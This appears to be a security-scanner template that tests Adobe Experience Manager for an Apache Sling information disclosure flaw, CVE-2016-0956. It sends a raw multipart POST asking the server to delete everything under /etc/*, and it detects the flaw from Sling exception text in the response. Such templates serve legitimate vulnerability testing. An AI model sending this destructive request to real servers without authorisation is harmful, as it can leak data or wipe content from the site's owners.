id: aem-sling-disclosure-cve-2016-0956
info:
  name: AEM Apache Sling Framework - Information Disclosure Vulnerability (CVE-2016-0956)
  risk: Low

# should provided from spider tool
variables:
  - endpoints: |
      /etc/reports/diskusage.html
      /libs/granite/core/content/login.html
      /libs/cq/core/content/login.html
      /about

requests:
  - method: POST
    redirect: false
    raw: |
      POST {{.endpoints}} HTTP/1.1
      Host: {{.Host}}
      User-Agent: curl/7.64.1
      Accept: */*
      Content-Length: 254
      Content-Type: multipart/form-data; boundary=------------------------a4b9f6b7e755609c
      Connection: close

      --------------------------a4b9f6b7e755609c
      Content-Disposition: form-data; name=":operation"

      delete
      --------------------------a4b9f6b7e755609c
      Content-Disposition: form-data; name=":applyTo"

      /etc/*
      --------------------------a4b9f6b7e755609c--
    detections:
      - >-
        StringSearch("response", ".SlingException") && StringSearch("response", "ChangeLog")

reference:
  - link: https://www.exploit-db.com/exploits/39435